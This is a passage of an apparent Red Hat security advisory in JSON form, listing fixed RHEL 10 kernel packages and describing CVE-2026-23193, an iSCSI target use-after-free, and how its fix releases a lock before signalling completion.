"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: Information disclosure in efivarfs via incorrect error propagation"
},
{
"cve": "CVE-2026-23193",
"cwe": {
"id": "CWE-364",
"name": "Signal Handler Race Condition"
},
"discovery_date": "2026-02-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439887"
}
],
"notes": [
{
"category": "description",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: iscsi: Fix use-after-free in iscsit_dec_session_usage_count()\n\nIn iscsit_dec_session_usage_count(), the function calls complete() while\nholding the sess-\u003esession_usage_lock. Similar to the connection usage count\nlogic, the waiter signaled by complete() (e.g., in the session release\npath) may wake up and free the iscsit_session structure immediately.\n\nThis creates a race condition where the current thread may attempt to\nexecute spin_unlock_bh() on a session structure that has already been\ndeallocated, resulting in a KASAN slab-use-after-free.\n\nTo resolve this, release the session_usage_lock before calling complete()\nto ensure all dereferences of the sess pointer are finished before the\nwaiter is allowed to proceed with deallocation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: scsi: target: iscsi: Fix use-after-free in iscsit_dec_session_usage_count()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A use after free can occur in the iSCSI target session usage count logic because iscsit_dec_session_usage_count can call complete while holding session_usage_lock. A waiting thread in the session release path can wake up and free the session structure immediately after the completion is signaled. The current thread may then attempt to unlock or otherwise access fields in a session object that has already been deallocated which can trigger a slab use after free and crash the kernel. The attack surface is adjacent network because iSCSI targets are typically reachable only inside storage or data center networks. Impact can be denial of service. A conservative assessment also considers potential confidentiality and integrity impact due to kernel memory corruption from a use after free.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
